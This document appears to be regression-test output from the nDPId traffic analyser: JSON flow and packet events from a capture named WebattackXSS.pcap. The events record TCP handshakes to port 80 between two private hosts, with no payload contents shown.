+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347517171,"flow_last_seen":1499347517171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347517171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1499347517171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PfRAAD4Gh9ysEAABwKgKMuKyAFAJ1z18AAAAAKACchAy6wAAAgQFtAQCCAoBOwCIAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":2,"flow_last_seen":1499347517171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4rJwyiE5Cdc9faAScSDL4wAAAgQFtAQCCAoD5NH+ATsAiAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":3,"flow_last_seen":1499347517172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347517172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PfVAAD4Gh+OsEAABwKgKMuKyAFAJ1z19cMohOoAQAOVq6gAAAQEICgE7AIkD5NH+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347518410,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347518410,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FGZAAD4GsWqsEAABwKgKMuLAAFAhaxXYAAAAAKACchBBtwAAAgQFtAQCCAoBOwG+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4592,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":2,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4sCWVenKIWsV2aAScSDrXAAAAgQFtAQCCAoD5NM0ATsBvgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":3,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FGdAAD4GsXGsEAABwKgKMuLAAFAhaxXZllXpy4AQAOWKZAAAAQEICgE7Ab4D5NM0"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347519679,"flow_last_seen":1499347519679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347519679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1499347519679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A+RAAD4GweysEAABwKgKMuLOAFBZkgEfAAAAAKACchAc\/gAAAgQFtAQCCAoBOwL7AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":2,"flow_last_seen":1499347519679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4s4k\/bw4WZIBIKAScSBkUQAAAgQFtAQCCAoD5NRxATsC+wEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":3,"flow_last_seen":1499347519680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347519680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A+VAAD4GwfOsEAABwKgKMuLOAFBZkgEgJP28OYAQAOUDWAAAAQEICgE7AvwD5NRx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347522204,"flow_last_seen":1499347522204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347522204,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1499347522204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G91AAD4GqfOsEAABwKgKMuLoAFAaMR6uAAAAAKACchA8PgAAAgQFtAQCCAoBOwVzAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":2,"flow_last_seen":1499347522204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4uhHWnn+GjEer6AScSCg9wAAAgQFtAQCCAoD5NboATsFcwEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":3,"flow_last_seen":1499347522205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347522205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G95AAD4GqfqsEAABwKgKMuLoAFAaMR6vR1p5\/4AQAOU\/\/wAAAQEICgE7BXMD5Nbo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347523488,"flow_last_seen":1499347523488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347523488,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1499347523488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bP1AAD4GWNOsEAABwKgKMuL2AFCTdmpJAAAAAKACchB2DgAAAgQFtAQCCAoBOwa0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":2,"flow_last_seen":1499347523488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4vYacquOk3ZqSqAScSDU3gAAAgQFtAQCCAoD5NgpATsGtAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":3,"flow_last_seen":1499347523489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347523489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bP5AAD4GWNqsEAABwKgKMuL2AFCTdmpKGnKrj4AQAOVz5gAAAQEICgE7BrQD5Ngp"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347524782,"flow_last_seen":1499347524782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347524782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1499347524782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uUBAAD4GDJCsEAABwKgKMuMEAFAFWr63AAAAAKACchCuawAAAgQFtAQCCAoBOwf3AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":2,"flow_last_seen":1499347524782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4wR+L\/VQBVq+uKAScSBeeAAAAgQFtAQCCAoD5NltATsH9wEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":3,"flow_last_seen":1499347524783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347524783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uUFAAD4GDJesEAABwKgKMuMEAFAFWr64fi\/1UYAQAOX9fwAAAQEICgE7B\/cD5Nlt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347526155,"flow_last_seen":1499347526155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526155,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1499347526155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vM5AAD4GCQKsEAABwKgKMuMSAFBd27WBAAAAAKACchBdugAAAgQFtAQCCAoBOwlPAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4658,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":2,"flow_last_seen":1499347526155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4xLVlk4tXdu1gqAScSBcLAAAAgQFtAQCCAoD5NrEATsJTwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":3,"flow_last_seen":1499347526156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347526156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vM9AAD4GCQmsEAABwKgKMuMSAFBd27WC1ZZOLoAQAOX7MwAAAQEICgE7CU8D5NrE"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347527425,"flow_last_seen":1499347527425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347527425,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1499347527425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84vtAAD4G4tSsEAABwKgKMuMgAFAAyeh3AAAAAKACchCGiwAAAgQFtAQCCAoBOwqMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":2,"flow_last_seen":1499347527425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4yBtIXfPAMnoeKAScSDCkwAAAgQFtAQCCAoD5NwBATsKjAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":3,"flow_last_seen":1499347527426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347527426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04vxAAD4G4tusEAABwKgKMuMgAFAAyeh4bSF30IAQAOVhmwAAAQEICgE7CowD5NwB"} 